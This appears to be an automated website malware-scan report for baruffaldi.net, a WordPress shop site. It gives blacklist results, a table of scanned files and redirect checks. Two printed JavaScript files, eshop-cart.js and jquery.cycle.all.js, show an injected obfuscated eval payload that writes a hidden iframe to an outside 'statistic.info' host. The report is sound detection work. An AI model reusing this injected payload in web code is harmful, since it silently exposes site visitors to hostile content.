Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=baruffaldi.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://baruffaldi.net/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.baruffaldi.net/ | 200 OK Content-Length: 32229 Content-Type: text/html | clean |
http://www.baruffaldi.net/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93107 Content-Type: application/x-javascript | clean |
http://www.baruffaldi.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7626 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.migrateMute===void 0&&(jQuery.migrateMute=!0),function(e,t,n){function r(n){var r=t.console;i[n]||(i[n]=!0,e.migrateWarnings.push(n),r&&r.warn&&!e.migrateMute&&(r.warn("JQMIGRATE: "+n),e.migrateTrace&&r.trace&&r.trace()))}function a(t,a,i,o){if(Object.defineProperty)try{return Object.defineProperty(t,a,{configurable:!0,enumerable:!0,get:function(){return r(o),i},set:function(e){r(o),i=e}}),n}catch(s){}e._definePropertyBroken=!0,t[a]=i}var i= <!-- . --> Antivirus reports:
| ||
http://www.baruffaldi.net/wp-content/uploads/eshop_files/eshop-cart.js?ver=3.6 | 200 OK Content-Length: 1500 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function($){ $('.addtocart').submit(function(){ var Id =$(this).attr("id"); var data = {action: 'eshop_special_action',post:$('#'+Id).serialize() }; $.post(""+eshopCartParams.adminajax, data, function(response){ $('#'+Id +" .eshopajax").after(this).fadeIn(parseInt(eshopCartParams.addfadein)).html(response).fadeOut(parseInt(eshopCartParams.addfadeout)); setTimeout (cleareshopCart,parseInt(eshopCartParams.cartcleardelay)); return false; }); });<!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://www.baruffaldi.net/wp-content/themes/baruffaldi/jquery-1.6.2.min.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://www.baruffaldi.net/wp-content/themes/baruffaldi/jquery.cycle.all.js | 200 OK Content-Length: 50920 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($) { var ver = '2.9997'; if ($.support == undefined) { $.support = { opacity: !($.browser.msie) }; } function debug(s) { $.fn.cycle.debug && log(s); } function log() { window.console && console.log && console.log('[cycle] ' + Array.prototype.join.call(arguments,' ')); } $.expr[':'].paused = function(el) { return el.cyclePause; } $.fn.cycle = function(options, arg2) { var o = { s: this }; })(jQuery); <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://www.baruffaldi.net/wp-content/plugins/wp-jquery-lightbox/jquery.touchwipe.min.js?ver=1.4 | 200 OK Content-Length: 1979 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){$.fn.touchwipe=function(settings){var config={min_move_x:20,min_move_y:20,wipeLeft:function(){},wipeRight:function(){},wipeUp:function(){},wipeDown:function(){},preventDefaultEvents:true};if(settings)$.extend(config,settings);this.each(function(){var startX;var startY;var isMoving=false;function cancelTouch(){this.removeEventListener('touchmove',onTouchMove);startX=null;isMoving=false}function onTouchMove(e){if(config.preventDefaultEvents){e.preventDefault()}if(isMoving){var x=e.tou <!-- . --> Antivirus reports:
| ||
http://www.baruffaldi.net/wp-content/plugins/wp-jquery-lightbox/jquery.lightbox.min.js?ver=1.4 | 200 OK Content-Length: 11031 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a){function b(f,c){var g,e,h;f=f.split(".");c=c.split(".");e=Math.min(f.length,c.length);for(g=0;g<e;g++){h=parseInt(f[g],10)-parseInt(c[g],10);if(h!==0){return h}}return f.length-c.length}a.fn.lightbox=function(l){var w=a.extend({},a.fn.lightbox.defaults,l);if(a("#overlay").is(":visible")){a(window).trigger("resize")}function r(){f();q(this);return false}if(b(a.fn.jquery,"1.7")>0){return a(this).on("click",r)}else{return a(this).live("click",r)}function f(){a(window).bind("orien <!-- . --> Antivirus reports:
| ||
http://www.baruffaldi.net/shopping-cart/ | 200 OK Content-Length: 25064 Content-Type: text/html | clean |
http://www.baruffaldi.net/wp-includes/js/comment-reply.min.js?ver=3.6 | 200 OK Content-Length: 1213 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form <!-- . --> Antivirus reports:
| ||
http://www.baruffaldi.net/shopping-cart/checkout/ | 200 OK Content-Length: 25090 Content-Type: text/html | clean |
http://www.baruffaldi.net/shopping-cart/checkout/?lang=it | 200 OK Content-Length: 25090 Content-Type: text/html | clean |
http://www.baruffaldi.net/shopping-cart/checkout/?lang=en | 200 OK Content-Length: 24971 Content-Type: text/html | clean |
http://www.baruffaldi.net/shopping-cart/checkout/?lang=de | 200 OK Content-Length: 25117 Content-Type: text/html | clean |
http://www.baruffaldi.net/shopping-cart/checkout/?lang=fr | 200 OK Content-Length: 25259 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: baruffaldi.net
Result:
GET / HTTP/1.1
Host: baruffaldi.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: baruffaldi.net
Referer: http://www.google.com/search?q=baruffaldi.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: baruffaldi.net
Referer: http://www.google.com/search?q=baruffaldi.net
Result:
The result is similar to the first query. There are no suspicious redirects found.